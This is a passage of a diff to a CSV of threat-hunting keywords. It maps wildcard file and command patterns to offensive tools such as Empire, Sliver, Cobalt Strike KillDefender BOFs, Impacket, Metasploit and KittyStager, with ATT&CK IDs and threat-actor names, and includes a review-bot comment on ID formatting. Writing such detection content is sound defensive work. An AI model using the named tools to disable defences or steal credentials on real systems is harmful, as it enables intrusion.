","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*kick-operator -n *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*killAllNimplants*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Kicking off download cradle in a new process*","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*kick-operator -n *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 
T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*killAllNimplants*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*killav.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*killdefender check*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*killdefender kill*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" 
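Review bot: The refreshed `sliver` and `nimplant` rows in this hunk still write ATT&CK sub-techniques with a hyphen (`T1573-001`, `T1059-001`, `T1574-001`, `T1569-002`), while the neighbouring rows use the dotted form (`T1548.002`). A lookup that joins `metadata_tool_techniques` against ATT&CK IDs will probably miss these rows. Since the lines are being rewritten anyway, normalise them to the dotted form, e.g. `T1573.001 - T1573.002 - T1059.001 - T1059.003`. `T1573-003` through `T1573-005` do not appear to match published sub-techniques and should be checked before they are kept. The `nimplant` row also lists `TA0002` twice in `metadata_tool_tactics` (`TA0002 - TA0005 - TA0002`).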
@@ -12771,41 +12927,41 @@ "*KillDefender_BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*killdefender_bof*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KillDefenderBOF-main*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" -"*Killed running eventvwr*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-EventVwrBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Killed running sdclt*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*kill-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
-"*killprocess.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*Killed running eventvwr*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-EventVwrBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Killed running sdclt*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*kill-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 
- T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*killprocess.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*kimi_MDPC/kimi.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*kirbi_to_hashcat.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" -"*kirbi2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
-"*kirbi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kirbi2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kirbi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*kirbi2john.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*kirbikator.exe*","offensive_tool_keyword","kekeo","access the LSA (Local Security Authority) and manipulate Kerberos tickets. 
potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gentilkiwi/kekeo","1","1","N/A","N/A","10","1277","216","2021-12-14T10:56:48Z","2015-01-13T21:24:09Z" "*kite03/echoac-poc*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" -"*kitrap0d.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*kitrap0d_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*kitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*kitten/basicKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*kitten_test.go*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. 
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*kittens/bananaKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*Kittielocal -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*KittyStager -*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager 